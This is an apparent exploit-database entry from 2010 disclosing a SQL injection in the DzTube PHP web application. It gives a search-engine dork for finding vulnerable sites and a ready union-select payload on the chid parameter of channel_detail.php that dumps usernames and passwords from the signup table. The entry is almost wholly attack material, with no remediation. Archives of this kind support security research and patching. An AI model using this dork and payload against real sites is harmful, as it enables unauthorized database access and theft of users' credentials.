exploit-db-mirror/platforms/php/webapps/15847.txt

Title: DzTube SQL Injection Vulnerability
Discovered: ErrNick
Site: xaknet.ru
Date: 28/12/2010
Vendor: n/a
d0rK: inurl:"channel_detail.php?chid="

Exploit: host.com/channel_detail.php?chid=[SQL]

Demo:
http://site/channel_detail.php?chid=-51+union+select+1,username,pwd,4,5,6,7,8,9,0,1,2,3,4,5,6+from+signup


Greatz: to xaknet.ru vulnes.com